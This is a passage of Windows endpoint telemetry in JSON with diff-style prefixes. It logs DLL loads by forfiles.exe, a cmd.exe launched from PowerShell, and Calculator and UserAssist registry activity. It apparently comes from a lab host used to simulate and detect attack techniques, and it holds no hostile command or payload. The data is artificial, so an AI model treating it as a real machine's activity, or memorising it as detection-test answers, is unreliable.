"pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "version.dll", - "image_path": "C:\\Windows\\System32\\version.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023490016, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "timestamp": 131883574023580000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "process", - "pid": 524, - "process_name": "forfiles.exe", - "process_path": "C:\\Windows\\System32\\forfiles.exe", - "subtype": "terminate", - "timestamp": 131883574023760000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001066A05701}" - }, - { - "event_type": "process", - "pid": 6296, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574024030000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-0010659F5701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\Software\\Microsoft\\Windows\\CurrentVersion\\AppModel\\SystemAppData\\Microsoft.WindowsCalculator_8wekyb3d8bbwe\\SplashScreen", - "registry_value": "SplashScreen", - "timestamp": 131883574024210000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4248, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574024270000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024320000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024370000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "registry_value": "C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri", - "timestamp": 131883574024420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "registry", - "pid": 5652, - "process_name": "ApplicationFrameHost.exe", - "process_path": "C:\\WINDOWS\\system32\\ApplicationFrameHost.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MrtCache\\C:%5CProgram Files%5CWindowsApps%5CMicrosoft.WindowsCalculator_10.1809.2731.0_x64__8wekyb3d8bbwe%5CMicrosoft.System.Package.Metadata%5CS-1-5-21-2047549730-3016700585-885829632-1000-MergedResources-3.pri\\1d48b5d987985a6\\fae8ab0e\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883574024420000, - "unique_pid": "{42FC7E13-B313-5C05-0000-001087F10600}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574024440000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574024490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\WindowSizing\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PreferredMinSize", - "registry_value": "PreferredMinSize", - "timestamp": 131883574024490000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 4248, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574024640000, - "unique_pid": "{42FC7E13-CC1A-5C05-0000-001008A45701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574024830000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574024940000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574025100000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574025100000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", - "registry_value": "ShowInSwitchers", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", - "registry_value": "VirtualDesktop", - "timestamp": 131883574025410000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ImmersiveShell\\PersistedApplicationData\\Volatile\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", - "timestamp": 131883574026000000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026280000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026360000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", - "registry_value": "Capabilities", - "timestamp": 131883574026380000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", - "registry_path": 